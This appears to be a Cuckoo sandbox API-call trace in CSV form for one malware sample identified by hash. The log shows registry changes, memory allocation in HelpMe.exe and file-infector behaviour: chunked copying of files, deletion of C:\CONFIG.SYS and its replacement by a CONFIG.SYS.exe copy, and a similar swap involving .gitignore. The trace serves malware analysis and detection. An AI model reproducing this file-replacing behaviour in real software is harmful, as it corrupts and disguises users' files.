"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->My Pictures"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->My Pictures","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents\My Pictures","cbData->124"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->39287"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->39287"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->268"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->268"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\CONFIG.SYS"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\CONFIG.SYS.exe","lpNewFileName->C:\CONFIG.SYS"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->268"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\additional\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->CompareJunctionness"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->ProgramFilesDir (x86)"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->71"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->71"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\additional\.gitignore"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->ProgramFilesDir"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->0x000001cc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->Generation"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c0","lpValueName->CommonPictures"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryA","SUCCESS","0x769c0000","lpFileName->USERENV.dll"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->ProfilesDirectory"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->AllUsersProfile"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->CommonPictures","dwType->1","lpData->C:\Documents and Settings\All Users\Documents\My Pictures","cbData->116"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExA","SUCCESS","0x000001ce","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\InProcServer32"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ce","lpValueName->(null)"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
